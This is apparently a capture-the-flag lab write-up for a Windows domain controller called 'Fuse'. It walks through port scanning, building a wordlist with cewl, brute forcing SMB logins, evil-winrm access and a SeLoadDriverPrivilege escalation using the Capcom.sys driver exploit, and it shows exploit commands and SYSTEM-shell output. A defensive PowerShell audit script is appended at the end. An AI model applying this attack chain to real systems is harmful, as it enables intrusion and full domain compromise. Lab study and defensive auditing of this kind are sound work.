$ nmap -p- --min-rate 5000 10.129.2.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 09:28 EDT
Nmap scan report for 10.129.2.5
Host is up (0.0074s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49680/tcp open unknown
49698/tcp open unknown
Loads of ports available.
Fabricorp
When we visit the hosted website, we need to add fuse.fabricorp.local to our /etc/hosts file. I also added fabricorp.local just in case. The website was some sort of printing service.
When we view the CSV files of each printing log, we can see the user that printed them.
We have 5 users in total:
bhult
administrator
sthompson
pmerton
tlavel
There wasn't much that I could do with this for now.
SMB + LDAP
Both of these services had nothing of interest. SMB allowed no null-session access to anything for these users, and LDAP didn't give me any more information.
Cewl
When stuck, try everything! We have a website and we don't have any credentials, so let's try cewl. This tool scrapes the website and builds a wordlist that we might be able to use for brute forcing SMB logins with crackmapexec.
Afterwards, we can enumerate the machine. Take note that the machine resets this password rather frequently, so enumeration needs to be quick.
SMB + RPC Enum
Using these credentials, we can first check out the SMB shares available via smbmap.
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
HP-MFT01 NO ACCESS HP-MFT01
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
Not much here. I used rpcclient to further enumerate the users and other domain information.
We now have more credentials! With this, we can try brute forcing the possible passwords with the username list we updated earlier.
We can test the credentials, and find that we are able to evil-winrm into the machine.
Grab the user flag!
Privilege Escalation
LoadDriver Fail
When checking our privileges, we come across a new one called SeLoadDriverPrivilege.
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
This is dangerous because it allows us to load device drivers onto the machine, and drivers run in kernel mode as SYSTEM. This Github repository contains the files we need to exploit this:
I cloned the repo, and then downloaded the relevant files over:
But following the PoC did not work for some reason. I think it is because the command executed by the pre-compiled binaries doesn't work on this machine. In that case, we would need to change the command that is being run so that it directly executes a reverse shell.
Second Attempt
First, we can create a reverse shell via msfvenom.
We can change it to always run the same command regardless of the arguments, which in this case is to execute the reverse shell we created. Here's the updated code:
We can then build this project into an .exe file and download it to Kali. Remember to select x64 and Release before building. I also compiled the EoPUploaderDriver file again, just in case.
Then, download all of them again and run it as per the PoC.
*Evil-WinRM* PS C:\Users\svc-print\desktop> .\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
*Evil-WinRM* PS C:\Users\svc-print\desktop> .\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys
[*] Service Name: bmpccxvu0ôLS
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\????????????????????
NTSTATUS: c0000033, WinError: 0
*Evil-WinRM* PS C:\Users\svc-print\desktop> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000001D1F5F00008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
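As an added defensive check (not part of the original writeup or of the exploit repository), the PowerShell audit below lists which accounts hold SeLoadDriverPrivilege and flags per-user registry keys that carry an ImagePath under HKU\<SID>\System\CurrentControlSet, the hive-relative location where the loader output above registered its driver service. The function names are my own; it assumes it is run elevated on the host being audited.

```powershell
# Added audit script (not from the writeup). Assumes an elevated session on the host.
# Part 1: who holds SeLoadDriverPrivilege according to the local security policy.
function Get-LoadDriverHolders {
    $cfg = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $line = Get-Content $cfg | Where-Object { $_ -match '^SeLoadDriverPrivilege\s*=' }
    Remove-Item $cfg -ErrorAction SilentlyContinue
    if (-not $line) { return @() }
    # Format is "SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550"; resolve each SID.
    ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object {
        $id = $_.Trim().TrimStart('*')
        try {
            ([System.Security.Principal.SecurityIdentifier]$id).Translate(
                [System.Security.Principal.NTAccount]).Value
        } catch { $id }   # leave unresolvable SIDs as-is
    }
}

# Part 2: a driver can be registered from a user hive, i.e. under
# \Registry\User\<SID>\System\CurrentControlSet\<name> with an ImagePath value.
# Legitimate driver services live under HKLM, so any hit here deserves a look.
# Only hives of currently loaded profiles are visible under HKEY_USERS.
function Find-UserHiveDriverKeys {
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    Get-ChildItem 'HKU:\' | Where-Object { $_.PSChildName -like 'S-1-5-21-*' } | ForEach-Object {
        $sid  = $_.PSChildName
        $root = "HKU:\$sid\System\CurrentControlSet"
        if (Test-Path $root) {
            Get-ChildItem $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
                $img = $_.GetValue('ImagePath')
                if ($img) {
                    [pscustomobject]@{ Sid = $sid; Key = $_.Name; ImagePath = $img }
                }
            }
        }
    }
}

Write-Host 'Accounts holding SeLoadDriverPrivilege:'
Get-LoadDriverHolders | ForEach-Object { Write-Host "  $_" }
Write-Host 'Driver-style service keys inside user hives (expect none):'
Find-UserHiveDriverKeys | Format-Table -AutoSize
```

A service account such as the printing one here showing up in the first list, or any row at all in the second, is the signal to remove the right from that account and to check the Security log for driver-load events around the time the key was written.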